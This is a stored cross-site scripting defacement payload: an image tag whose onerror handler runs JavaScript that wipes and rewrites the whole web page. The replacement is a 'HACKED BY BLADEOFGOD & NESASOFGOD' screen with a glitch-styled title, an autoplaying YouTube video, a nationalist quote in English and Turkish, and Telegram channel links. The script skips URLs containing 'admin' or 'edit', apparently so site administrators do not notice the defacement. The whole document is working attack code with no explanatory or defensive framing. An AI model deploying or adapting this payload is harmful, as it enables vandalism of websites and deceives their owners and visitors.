<img src="x" onerror='(function(){
/* 1. ADMIN PANEL KORUMASI */
if(window.location.href.includes("p-admin") || window.location.href.includes("edit") || window.location.href.includes("admin")) return;
/* 2. TÜM SAYFAYI SIFIRLA VE YENİDEN YAZ */
document.open();
document.write(`
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>SYSTEM FAILURE - HACKED</title>
<link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet">
<style>
body, html {
margin: 0; padding: 0; width: 100%; height: 100%;
background: #000 !important; overflow: hidden !important;
font-family: "Share Tech Mono", monospace; color: #fff;
}
#hacker-overlay {
position: fixed; top: 0; left: 0; width: 100vw; height: 100vh;
display: flex; justify-content: center; align-items: center;
background: #000; z-index: 9999999; text-align: center;
padding: 20px; box-sizing: border-box;
}
.container { max-width: 800px; width: 100%; }
.video-box {
position: relative; width: 100%; padding-bottom: 56.25%;
margin-bottom: 25px; border: 2px solid #222;
box-shadow: 0 0 30px rgba(255, 0, 0, 0.5);
}
.video-box iframe {
position: absolute; top: 0; left: 0; width: 100%; height: 100%;
}
.title {
font-size: clamp(18px, 5vw, 30px); font-weight: bold;
text-transform: uppercase; letter-spacing: 2px;
animation: glitch 1s infinite; margin-bottom: 10px;
}
@keyframes glitch {
0% { text-shadow: 2px 0 red; }
50% { text-shadow: -2px 0 blue; }
100% { text-shadow: 2px 0 red; }
}
.red-line {
color: #ff0000; font-size: 18px; margin: 10px 0;
text-shadow: 0 0 10px red; font-weight: bold;
}
.quote { color: #ccc; margin: 15px 0; line-height: 1.6; font-size: 15px; }
.footer { margin-top: 25px; color: #ff0000; font-weight: bold; letter-spacing: 1px; }
</style>
</head>
<body>
<div id="hacker-overlay">
<div class="container">
<div class="video-box">
<iframe src="https://www.youtube.com/embed/CPXNxEdI3KQ?autoplay=1&mute=1&loop=1&playlist=CPXNxEdI3KQ&controls=0&showinfo=0"
frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
</div>
<div class="title">HACKED BY BLADEOFGOD & NESASOFGOD</div>
<div class="red-line">SYSTEM BREACHED / SİSTEME SIZILDI</div>
<div class="quote">
“My Country, My Honor, My Flag... As long as we breathe,<br>
we will visit the whole world and leave our message…”<br>
<i style="color:#666;">“Ülkem, Onurum, Bayrağım... Nefes aldıkça tüm dünyaya uğrayacağız…”</i>
</div>
<div class="footer">t.me/Nesas_0day | t.me/bladleaks</div>
</div>
</div>
</body>
</html>`);
document.close();
})();'>